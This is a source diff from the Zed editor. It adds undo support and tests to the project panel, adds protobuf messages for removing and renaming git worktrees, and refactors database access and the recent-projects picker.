+ .update(cx, |editor, cx| editor.set_text("c.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(find_project_entry(&panel, "root/b.txt", cx).is_some());
+ assert!(find_project_entry(&panel, "root/c.txt", cx).is_some());
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/c.txt", cx),
+ None,
+ "c.txt should be removed after first undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/b.txt", cx).is_some(),
+ "b.txt should still exist after first undo"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "a.txt should be restored after second undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/b.txt", cx),
+ None,
+ "b.txt should no longer exist after second undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_with_empty_stack(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
panel.update_in(cx, |panel, window, cx| {
- panel.paste(&Default::default(), window, cx)
+ panel.undo(&Undo, window, cx);
});
- cx.executor().run_until_parked();
- assert_eq!(
- visible_entries_as_strings(&panel, 0..50, cx),
- &[
- //
- "v root",
- " > a",
- " v b",
- " v a",
- " v inner_dir",
- " four.txt",
- " three.txt",
- " one.txt",
- " two.txt",
- " v c",
- " > a <== selected",
- " > inner_dir",
- " one.txt",
- " two.txt",
- ]
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "File tree should be unchanged after undo on empty stack"
);
}
#[gpui::test]
-async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) {
+async fn test_undo_batch(cx: &mut gpui::TestAppContext) {
init_test(cx);
let fs = FakeFs::new(cx.executor());
fs.insert_tree(
- "/test",
+ "/root",
json!({
- "dir1": {
- "a.txt": "",
- "b.txt": "",
- },
- "dir2": {},
- "c.txt": "",
- "d.txt": "",
+ "src": {
+ "main.rs": "// Code!"
+ }
}),
)
.await;
- let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
let workspace = window
.read_with(cx, |mw, _| mw.workspace().clone())
.unwrap();
let cx = &mut VisualTestContext::from_window(window.into(), cx);
let panel = workspace.update_in(cx, ProjectPanel::new);
+ let worktree_id = project.update(cx, |project, cx| {
+ project.visible_worktrees(cx).next().unwrap().read(cx).id()
+ });
cx.run_until_parked();
- toggle_expand_dir(&panel, "test/dir1", cx);
-
- cx.simulate_modifiers_change(gpui::Modifiers {
- control: true,
- ..Default::default()
+    // There is currently no way to create a folder and a file within it as
+    // two separate operations batched under a single
+    // `ProjectPanelOperation::Batch`, so we record the operations ourselves,
+    // relying on the fact that the filesystem already contains the folder
+    // and file referenced by these operations.
+ panel.update(cx, |panel, _cx| {
+ panel.undo_manager.record_batch(vec![
+ ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ worktree_id,
+ path: Arc::from(rel_path("src/main.rs")),
+ },
+ },
+ ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ worktree_id,
+ path: Arc::from(rel_path("src/")),
+ },
+ },
+ ]);
});
- select_path_with_mark(&panel, "test/dir1", cx);
- select_path_with_mark(&panel, "test/c.txt", cx);
-
+ // Ensure that `src/main.rs` is present in the filesystem before proceeding,
+ // otherwise this test is irrelevant.
+ assert_eq!(fs.files(), vec![PathBuf::from(path!("/root/src/main.rs"))]);
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
- &[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " > dir2",
- " c.txt <== selected <== marked",
- " d.txt",
- ],
- "Initial state before copying dir1 and c.txt"
+ fs.directories(false),
+ vec![
+ PathBuf::from(path!("/")),
+ PathBuf::from(path!("/root/")),
+ PathBuf::from(path!("/root/src/"))
+ ]
);
panel.update_in(cx, |panel, window, cx| {
- panel.copy(&Default::default(), window, cx);
- });
- select_path(&panel, "test/dir2", cx);
- panel.update_in(cx, |panel, window, cx| {
- panel.paste(&Default::default(), window, cx);
+ panel.undo(&Undo, window, cx);
});
- cx.executor().run_until_parked();
-
- toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+ cx.run_until_parked();
+ assert_eq!(fs.files().len(), 0);
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
- &[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " v dir2",
- " v dir1 <== selected",
- " a.txt",
- " b.txt",
- " c.txt",
- " c.txt <== marked",
- " d.txt",
- ],
- "Should copy dir1 as well as c.txt into dir2"
+ fs.directories(false),
+ vec![PathBuf::from(path!("/")), PathBuf::from(path!("/root/"))]
);
+}
- // Disambiguating multiple files should not open the rename editor.
- select_path(&panel, "test/dir2", cx);
+#[gpui::test]
+async fn test_paste_external_paths(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+ set_auto_open_settings(
+ cx,
+ ProjectPanelAutoOpenSettings {
+ on_drop: Some(false),
+ ..Default::default()
+ },
+ );
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "subdir": {}
+ }),
+ )
+ .await;
+
+ fs.insert_tree(
+ path!("/external"),
+ json!({
+ "new_file.rs": "fn main() {}"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ cx.write_to_clipboard(ClipboardItem {
+ entries: vec![GpuiClipboardEntry::ExternalPaths(ExternalPaths(
+ smallvec::smallvec![PathBuf::from(path!("/external/new_file.rs"))],
+ ))],
+ });
+
+ select_path(&panel, "root/subdir", cx);
panel.update_in(cx, |panel, window, cx| {
panel.paste(&Default::default(), window, cx);
});
cx.executor().run_until_parked();
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
+ visible_entries_as_strings(&panel, 0..50, cx),
&[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " v dir2",
- " v dir1",
- " a.txt",
- " b.txt",
- " > dir1 copy <== selected",
- " c.txt",
- " c copy.txt",
- " c.txt <== marked",
- " d.txt",
+ "v root",
+ " v subdir",
+ " new_file.rs <== selected",
],
- "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor"
);
}
#[gpui::test]
-async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) {
+async fn test_copy_and_cut_write_to_system_clipboard(cx: &mut gpui::TestAppContext) {
init_test(cx);
let fs = FakeFs::new(cx.executor());
fs.insert_tree(
- "/test",
+ path!("/root"),
json!({
- "dir1": {
- "a.txt": "",
- "b.txt": "",
- },
- "dir2": {},
- "c.txt": "",
- "d.txt": "",
+ "file_a.txt": "",
+ "file_b.txt": ""
}),
)
.await;
- let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
let workspace = window
.read_with(cx, |mw, _| mw.workspace().clone())
@@ -0,0 +1,286 @@
+use anyhow::anyhow;
+use gpui::{AppContext, SharedString, Task, WeakEntity};
+use project::ProjectPath;
+use std::collections::VecDeque;
+use ui::{App, IntoElement, Label, ParentElement, Styled, v_flex};
+use workspace::{
+ Workspace,
+ notifications::{NotificationId, simple_message_notification::MessageNotification},
+};
+
+const MAX_UNDO_OPERATIONS: usize = 10_000;
+
+#[derive(Clone)]
+pub enum ProjectPanelOperation {
+ Batch(Vec<ProjectPanelOperation>),
+ Create {
+ project_path: ProjectPath,
+ },
+ Rename {
+ old_path: ProjectPath,
+ new_path: ProjectPath,
+ },
+}
+
+pub struct UndoManager {
+ workspace: WeakEntity<Workspace>,
+ stack: VecDeque<ProjectPanelOperation>,
+ /// Maximum number of operations to keep on the undo stack.
+ limit: usize,
+}
+
+impl UndoManager {
+ pub fn new(workspace: WeakEntity<Workspace>) -> Self {
+ Self::new_with_limit(workspace, MAX_UNDO_OPERATIONS)
+ }
+
+ pub fn new_with_limit(workspace: WeakEntity<Workspace>, limit: usize) -> Self {
+ Self {
+ workspace,
+ limit,
+ stack: VecDeque::new(),
+ }
+ }
+
+ pub fn can_undo(&self) -> bool {
+ !self.stack.is_empty()
+ }
+
+ pub fn undo(&mut self, cx: &mut App) {
+ if let Some(operation) = self.stack.pop_back() {
+ let task = self.revert_operation(operation, cx);
+ let workspace = self.workspace.clone();
+
+ cx.spawn(async move |cx| {
+ let errors = task.await;
+ if !errors.is_empty() {
+ cx.update(|cx| {
+ let messages = errors
+ .iter()
+ .map(|err| SharedString::from(err.to_string()))
+ .collect();
+
+ Self::show_errors(workspace, messages, cx)
+ })
+ }
+ })
+ .detach();
+ }
+ }
+
+ pub fn record(&mut self, operation: ProjectPanelOperation) {
+ if self.stack.len() >= self.limit {
+ self.stack.pop_front();
+ }
+
+ self.stack.push_back(operation);
+ }
+
+ pub fn record_batch(&mut self, operations: impl IntoIterator<Item = ProjectPanelOperation>) {
+ let mut operations = operations.into_iter().collect::<Vec<_>>();
+ let operation = match operations.len() {
+ 0 => return,
+ 1 => operations.pop().unwrap(),
+ _ => ProjectPanelOperation::Batch(operations),
+ };
+
+ self.record(operation);
+ }
+
+ /// Attempts to revert the provided `operation`, returning a vector of errors
+ /// in case there was any failure while reverting the operation.
+ ///
+ /// For all operations other than [`crate::undo::ProjectPanelOperation::Batch`], a maximum
+ /// of one error is returned.
+ fn revert_operation(
+ &self,
+ operation: ProjectPanelOperation,
+ cx: &mut App,
+ ) -> Task<Vec<anyhow::Error>> {
+ match operation {
+ ProjectPanelOperation::Create { project_path } => {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return Task::ready(vec![anyhow!("Failed to obtain workspace.")]);
+ };
+
+ let result = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ let entry_id = project
+ .entry_for_path(&project_path, cx)
+ .map(|entry| entry.id)
+ .ok_or_else(|| anyhow!("No entry for path."))?;
+
+ project
+ .delete_entry(entry_id, true, cx)
+ .ok_or_else(|| anyhow!("Failed to trash entry."))
+ })
+ });
+
+ let task = match result {
+ Ok(task) => task,
+ Err(err) => return Task::ready(vec![err]),
+ };
+
+ cx.spawn(async move |_| match task.await {
+ Ok(_) => vec![],
+ Err(err) => vec![err],
+ })
+ }
+ ProjectPanelOperation::Rename { old_path, new_path } => {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return Task::ready(vec![anyhow!("Failed to obtain workspace.")]);
+ };
+
+ let result = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ let entry_id = project
+ .entry_for_path(&new_path, cx)
+ .map(|entry| entry.id)
+ .ok_or_else(|| anyhow!("No entry for path."))?;
+
+ Ok(project.rename_entry(entry_id, old_path.clone(), cx))
+ })
+ });
+
+ let task = match result {
+ Ok(task) => task,
+ Err(err) => return Task::ready(vec![err]),
+ };
+
+ cx.spawn(async move |_| match task.await {
+ Ok(_) => vec![],
+ Err(err) => vec![err],
+ })
+ }
+ ProjectPanelOperation::Batch(operations) => {
+ // When reverting operations in a batch, we reverse the order of
+ // operations to handle dependencies between them. For example,
+ // if a batch contains the following order of operations:
+ //
+ // 1. Create `src/`
+ // 2. Create `src/main.rs`
+ //
+ // If we first try to revert the directory creation, it would
+ // fail because there's still files inside the directory.
+ // Operations are also reverted sequentially in order to avoid
+ // this same problem.
+ let tasks: Vec<_> = operations
+ .into_iter()
+ .rev()
+ .map(|operation| self.revert_operation(operation, cx))
+ .collect();
+
+ cx.spawn(async move |_| {
+ let mut errors = Vec::new();
+ for task in tasks {
+ errors.extend(task.await);
+ }
+ errors
+ })
+ }
+ }
+ }
+
+    /// Displays a notification listing the provided errors. When more than one
+    /// error is provided — which can happen when undoing a
+    /// [`crate::undo::ProjectPanelOperation::Batch`] — each error is shown as
+    /// an item in a list rather than as a single message.
+ fn show_errors(workspace: WeakEntity<Workspace>, messages: Vec<SharedString>, cx: &mut App) {
+ workspace
+ .update(cx, move |workspace, cx| {
+ let notification_id =
+ NotificationId::Named(SharedString::new_static("project_panel_undo"));
+
+ workspace.show_notification(notification_id, cx, move |cx| {
+ cx.new(|cx| {
+ if let [err] = messages.as_slice() {
+ MessageNotification::new(err.to_string(), cx)
+ .with_title("Failed to undo Project Panel Operation")
+ } else {
+ MessageNotification::new_from_builder(cx, move |_, _| {
+ v_flex()
+ .gap_1()
+ .children(
+ messages
+ .iter()
+ .map(|message| Label::new(format!("- {message}"))),
+ )
+ .into_any_element()
+ })
+ .with_title("Failed to undo Project Panel Operations")
+ }
+ })
+ })
+ })
+ .ok();
+ }
+}
+
+#[cfg(test)]
+mod test {
+ use crate::{
+ ProjectPanel, project_panel_tests,
+ undo::{ProjectPanelOperation, UndoManager},
+ };
+ use gpui::{Entity, TestAppContext, VisualTestContext};
+ use project::{FakeFs, Project, ProjectPath};
+ use std::sync::Arc;
+ use util::rel_path::rel_path;
+ use workspace::MultiWorkspace;
+
+ struct TestContext {
+ project: Entity<Project>,
+ panel: Entity<ProjectPanel>,
+ }
+
+ async fn init_test(cx: &mut TestAppContext) -> TestContext {
+ project_panel_tests::init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ TestContext { project, panel }
+ }
+
+ #[gpui::test]
+ async fn test_limit(cx: &mut TestAppContext) {
+ let test_context = init_test(cx).await;
+ let worktree_id = test_context.project.update(cx, |project, cx| {
+ project.visible_worktrees(cx).next().unwrap().read(cx).id()
+ });
+
+ let build_create_operation = |file_name: &str| ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ path: Arc::from(rel_path(file_name)),
+ worktree_id,
+ },
+ };
+
+ // Since we're updating the `ProjectPanel`'s undo manager with one whose
+ // limit is 3 operations, we only need to create 4 operations which
+ // we'll record, in order to confirm that the oldest operation is
+ // evicted.
+ let operation_a = build_create_operation("file_a.txt");
+ let operation_b = build_create_operation("file_b.txt");
+ let operation_c = build_create_operation("file_c.txt");
+ let operation_d = build_create_operation("file_d.txt");
+
+ test_context.panel.update(cx, move |panel, _cx| {
+ panel.undo_manager = UndoManager::new_with_limit(panel.workspace.clone(), 3);
+ panel.undo_manager.record(operation_a);
+ panel.undo_manager.record(operation_b);
+ panel.undo_manager.record(operation_c);
+ panel.undo_manager.record(operation_d);
+
+ assert_eq!(panel.undo_manager.stack.len(), 3);
+ });
+ }
+}
@@ -222,7 +222,7 @@ message ExternalExtensionAgentsUpdated {
message ExternalAgentLoadingStatusUpdated {
uint64 project_id = 1;
string name = 2;
- string status = 3;
+ reserved 3;
}
message NewExternalAgentVersionAvailable {
@@ -126,6 +126,7 @@ message UpdateRepository {
optional string remote_upstream_url = 14;
optional string remote_origin_url = 15;
optional string original_repo_abs_path = 16;
+ repeated Worktree linked_worktrees = 17;
}
message RemoveRepository {
@@ -209,6 +210,7 @@ message GitDeleteBranch {
uint64 project_id = 1;
uint64 repository_id = 2;
string branch_name = 3;
+ bool is_remote = 4;
}
message GitDiff {
@@ -583,6 +585,20 @@ message GitCreateWorktree {
optional string commit = 5;
}
+message GitRemoveWorktree {
+ uint64 project_id = 1;
+ uint64 repository_id = 2;
+ string path = 3;
+ bool force = 4;
+}
+
+message GitRenameWorktree {
+ uint64 project_id = 1;
+ uint64 repository_id = 2;
+ string old_path = 3;
+ string new_path = 4;
+}
+
message RunGitHook {
enum GitHook {
PRE_COMMIT = 0;
@@ -230,6 +230,7 @@ message ApplyCompletionAdditionalEdits {
uint64 project_id = 1;
uint64 buffer_id = 2;
Completion completion = 3;
+ repeated AnchorRange all_commit_ranges = 4;
}
message ApplyCompletionAdditionalEditsResponse {
@@ -474,7 +474,9 @@ message Envelope {
SpawnKernel spawn_kernel = 426;
SpawnKernelResponse spawn_kernel_response = 427;
- KillKernel kill_kernel = 428; // current max
+ KillKernel kill_kernel = 428;
+ GitRemoveWorktree git_remove_worktree = 431;
+ GitRenameWorktree git_rename_worktree = 432; // current max
}
reserved 87 to 88;
@@ -354,6 +354,8 @@ messages!(
(GitGetWorktrees, Background),
(GitWorktreesResponse, Background),
(GitCreateWorktree, Background),
+ (GitRemoveWorktree, Background),
+ (GitRenameWorktree, Background),
(ShareAgentThread, Foreground),
(GetSharedAgentThread, Foreground),
(GetSharedAgentThreadResponse, Foreground),
@@ -557,6 +559,8 @@ request_messages!(
(RemoteStarted, Ack),
(GitGetWorktrees, GitWorktreesResponse),
(GitCreateWorktree, Ack),
+ (GitRemoveWorktree, Ack),
+ (GitRenameWorktree, Ack),
(TrustWorktrees, Ack),
(RestrictWorktrees, Ack),
(FindSearchCandidatesChunk, Ack),
@@ -747,6 +751,8 @@ entity_messages!(
NewExternalAgentVersionAvailable,
GitGetWorktrees,
GitCreateWorktree,
+ GitRemoveWorktree,
+ GitRenameWorktree,
TrustWorktrees,
RestrictWorktrees,
FindSearchCandidatesChunk,
@@ -1,9 +1,10 @@
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use dev_container::find_configs_in_snapshot;
use gpui::{SharedString, Window};
use project::{Project, WorktreeId};
use std::sync::LazyLock;
use ui::prelude::*;
+use util::ResultExt;
use util::rel_path::RelPath;
use workspace::Workspace;
use workspace::notifications::NotificationId;
@@ -61,7 +62,7 @@ pub fn suggest_on_worktree_updated(
let project_path = abs_path.to_string_lossy().to_string();
let key_for_dismiss = project_devcontainer_key(&project_path);
- let already_dismissed = KEY_VALUE_STORE
+ let already_dismissed = KeyValueStore::global(cx)
.read_kvp(&key_for_dismiss)
.ok()
.flatten()
@@ -98,9 +99,13 @@ pub fn suggest_on_worktree_updated(
.secondary_on_click({
move |_window, cx| {
let key = key_for_dismiss.clone();
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string())
- });
+ let kvp = KeyValueStore::global(cx);
+ cx.background_spawn(async move {
+ kvp.write_kvp(key, "dismissed".to_string())
+ .await
+ .log_err();
+ })
+ .detach();
}
})
})
@@ -2,11 +2,7 @@ use gpui::{ClickEvent, DismissEvent, EventEmitter, FocusHandle, Focusable, Rende
use project::project_settings::ProjectSettings;
use remote::RemoteConnectionOptions;
use settings::Settings;
-use ui::{
- Button, ButtonCommon, ButtonStyle, Clickable, Context, ElevationIndex, FluentBuilder, Headline,
- HeadlineSize, IconName, IconPosition, InteractiveElement, IntoElement, Label, Modal,
- ModalFooter, ModalHeader, ParentElement, Section, Styled, StyledExt, Window, div, h_flex, rems,
-};
+use ui::{ElevationIndex, Modal, ModalFooter, ModalHeader, Section, prelude::*};
use workspace::{
ModalView, MultiWorkspace, OpenOptions, Workspace, notifications::DetachAndPromptErr,
};
@@ -207,8 +203,7 @@ impl Render for DisconnectedOverlay {
Button::new("reconnect", "Reconnect")
.style(ButtonStyle::Filled)
.layer(ElevationIndex::ModalSurface)
- .icon(IconName::ArrowCircle)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ArrowCircle))
.on_click(cx.listener(Self::handle_reconnect)),
)
}),
@@ -2,9 +2,11 @@ mod dev_container_suggest;
pub mod disconnected_overlay;
mod remote_connections;
mod remote_servers;
+pub mod sidebar_recent_projects;
mod ssh_config;
use std::{
+ collections::HashSet,
path::{Path, PathBuf},
sync::Arc,
};
@@ -45,7 +47,7 @@ use ui::{
use util::{ResultExt, paths::PathExt};
use workspace::{
HistoryManager, ModalView, MultiWorkspace, OpenOptions, OpenVisible, PathList,
- SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId,
+ SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId,
notifications::DetachAndPromptErr, with_active_or_new_workspace,
};
use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote};
@@ -74,6 +76,7 @@ struct OpenFolderEntry {
enum ProjectPickerEntry {
Header(SharedString),
OpenFolder { index: usize, positions: Vec<usize> },
+ OpenProject(StringMatch),
RecentProject(StringMatch),
}
@@ -87,8 +90,9 @@ pub async fn get_recent_projects(
current_workspace_id: Option<WorkspaceId>,
limit: Option<usize>,
fs: Arc<dyn fs::Fs>,
+ db: &WorkspaceDb,
) -> Vec<RecentProjectEntry> {
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default();
@@ -137,8 +141,8 @@ pub async fn get_recent_projects(
}
}
-pub async fn delete_recent_project(workspace_id: WorkspaceId) {
- let _ = WORKSPACE_DB.delete_workspace_by_id(workspace_id).await;
+pub async fn delete_recent_project(workspace_id: WorkspaceId, db: &WorkspaceDb) {
+ let _ = db.delete_workspace_by_id(workspace_id).await;
}
fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec<OpenFolderEntry> {
@@ -198,17 +202,19 @@ fn get_branch_for_worktree(
cx: &App,
) -> Option<SharedString> {
let worktree_abs_path = worktree.abs_path();
- for repo in repositories {
- let repo = repo.read(cx);
- if repo.work_directory_abs_path == worktree_abs_path
- || worktree_abs_path.starts_with(&*repo.work_directory_abs_path)
- {
- if let Some(branch) = &repo.branch {
- return Some(SharedString::from(branch.name().to_string()));
- }
- }
- }
- None
+ repositories
+ .iter()
+ .filter(|repo| {
+ let repo_path = &repo.read(cx).work_directory_abs_path;
+ *repo_path == worktree_abs_path || worktree_abs_path.starts_with(repo_path.as_ref())
+ })
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
+ .and_then(|repo| {
+ repo.read(cx)
+ .branch
+ .as_ref()
+ .map(|branch| SharedString::from(branch.name().to_string()))
+ })
}
pub fn init(cx: &mut App) {
@@ -337,19 +343,71 @@ pub fn init(cx: &mut App) {
cx.on_action(|open_recent: &OpenRecent, cx| {
let create_new_window = open_recent.create_new_window;
- with_active_or_new_workspace(cx, move |workspace, window, cx| {
- let Some(recent_projects) = workspace.active_modal::<RecentProjects>(cx) else {
- let focus_handle = workspace.focus_handle(cx);
- RecentProjects::open(workspace, create_new_window, window, focus_handle, cx);
- return;
- };
- recent_projects.update(cx, |recent_projects, cx| {
- recent_projects
- .picker
- .update(cx, |picker, cx| picker.cycle_selection(window, cx))
- });
- });
+ match cx
+ .active_window()
+ .and_then(|w| w.downcast::<MultiWorkspace>())
+ {
+ Some(multi_workspace) => {
+ cx.defer(move |cx| {
+ multi_workspace
+ .update(cx, |multi_workspace, window, cx| {
+ let sibling_workspace_ids: HashSet<WorkspaceId> = multi_workspace
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect();
+
+ let workspace = multi_workspace.workspace().clone();
+ workspace.update(cx, |workspace, cx| {
+ let Some(recent_projects) =
+ workspace.active_modal::<RecentProjects>(cx)
+ else {
+ let focus_handle = workspace.focus_handle(cx);
+ RecentProjects::open(
+ workspace,
+ create_new_window,
+ sibling_workspace_ids,
+ window,
+ focus_handle,
+ cx,
+ );
+ return;
+ };
+
+ recent_projects.update(cx, |recent_projects, cx| {
+ recent_projects
+ .picker
+ .update(cx, |picker, cx| picker.cycle_selection(window, cx))
+ });
+ });
+ })
+ .log_err();
+ });
+ }
+ None => {
+ with_active_or_new_workspace(cx, move |workspace, window, cx| {
+ let Some(recent_projects) = workspace.active_modal::<RecentProjects>(cx) else {
+ let focus_handle = workspace.focus_handle(cx);
+ RecentProjects::open(
+ workspace,
+ create_new_window,
+ HashSet::new(),
+ window,
+ focus_handle,
+ cx,
+ );
+ return;
+ };
+
+ recent_projects.update(cx, |recent_projects, cx| {
+ recent_projects
+ .picker
+ .update(cx, |picker, cx| picker.cycle_selection(window, cx))
+ });
+ });
+ }
+ }
});
cx.on_action(|open_remote: &OpenRemote, cx| {
let from_existing_connection = open_remote.from_existing_connection;
@@ -469,7 +527,7 @@ pub fn add_wsl_distro(
pub struct RecentProjects {
pub picker: Entity<Picker<RecentProjectsDelegate>>,
rem_width: f32,
- _subscription: Subscription,
+ _subscriptions: Vec<Subscription>,
}
impl ModalView for RecentProjects {
@@ -493,6 +551,7 @@ impl RecentProjects {
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
+ let style = delegate.style;
let picker = cx.new(|cx| {
Picker::list(delegate, window, cx)
.list_measure_all()
@@ -504,16 +563,32 @@ impl RecentProjects {
picker.delegate.focus_handle = picker_focus_handle;
});
- let _subscription = cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent));
+ let mut subscriptions = vec![cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent))];
+
+ if style == ProjectPickerStyle::Popover {
+ let picker_focus = picker.focus_handle(cx);
+ subscriptions.push(
+ cx.on_focus_out(&picker_focus, window, |this, _, window, cx| {
+ let submenu_focused = this.picker.update(cx, |picker, cx| {
+ picker.delegate.actions_menu_handle.is_focused(window, cx)
+ });
+ if !submenu_focused {
+ cx.emit(DismissEvent);
+ }
+ }),
+ );
+ }
// We do not want to block the UI on a potentially lengthy call to DB, so we're gonna swap
// out workspace locations once the future runs to completion.
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this, cx| {
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.log_err()
.unwrap_or_default();
+ let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
this.update_in(cx, move |this, window, cx| {
this.picker.update(cx, move |picker, cx| {
picker.delegate.set_workspaces(workspaces);
@@ -526,13 +601,14 @@ impl RecentProjects {
Self {
picker,
rem_width,
- _subscription,
+ _subscriptions: subscriptions,
}
}
pub fn open(
workspace: &mut Workspace,
create_new_window: bool,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
window: &mut Window,
focus_handle: FocusHandle,
cx: &mut Context<Workspace>,
@@ -541,12 +617,14 @@ impl RecentProjects {
let open_folders = get_open_folders(workspace, cx);
let project_connection_options = workspace.project().read(cx).remote_connection_options(cx);
let fs = Some(workspace.app_state().fs.clone());
+
workspace.toggle_modal(window, cx, |window, cx| {
let delegate = RecentProjectsDelegate::new(
weak,
create_new_window,
focus_handle,
open_folders,
+ sibling_workspace_ids,
project_connection_options,
ProjectPickerStyle::Modal,
);
@@ -557,6 +635,7 @@ impl RecentProjects {
pub fn popover(
workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
create_new_window: bool,
focus_handle: FocusHandle,
window: &mut Window,
@@ -580,6 +659,7 @@ impl RecentProjects {
create_new_window,
focus_handle,
open_folders,
+ sibling_workspace_ids,
project_connection_options,
ProjectPickerStyle::Popover,
);
@@ -627,6 +707,7 @@ impl Render for RecentProjects {
pub struct RecentProjectsDelegate {
workspace: WeakEntity<Workspace>,
open_folders: Vec<OpenFolderEntry>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
workspaces: Vec<(
WorkspaceId,
SerializedWorkspaceLocation,
@@ -652,6 +733,7 @@ impl RecentProjectsDelegate {
create_new_window: bool,
focus_handle: FocusHandle,
open_folders: Vec<OpenFolderEntry>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
project_connection_options: Option<RemoteConnectionOptions>,
style: ProjectPickerStyle,
) -> Self {
@@ -659,6 +741,7 @@ impl RecentProjectsDelegate {
Self {
workspace,
open_folders,
+ sibling_workspace_ids,
workspaces: Vec::new(),
filtered_entries: Vec::new(),
selected_index: 0,
@@ -705,32 +788,14 @@ impl PickerDelegate for RecentProjectsDelegate {
window: &mut Window,
cx: &mut Context<Picker<Self>>,
) -> Div {
- let focus_handle = self.focus_handle.clone();
-
h_flex()
.flex_none()
.h_9()
- .pl_2p5()
- .pr_1p5()
+ .px_2p5()
.justify_between()
.border_b_1()
.border_color(cx.theme().colors().border_variant)
.child(editor.render(window, cx))
- .child(
- IconButton::new("add_folder", IconName::Plus)
- .icon_size(IconSize::Small)
- .tooltip(move |_, cx| {
- Tooltip::for_action_in(
- "Add Project to Workspace",
- &workspace::AddFolderToProject,
- &focus_handle,
- cx,
- )
- })
- .on_click(|_, window, cx| {
- window.dispatch_action(workspace::AddFolderToProject.boxed_clone(), cx)
- }),
- )
}
fn match_count(&self) -> usize {
@@ -753,7 +818,11 @@ impl PickerDelegate for RecentProjectsDelegate {
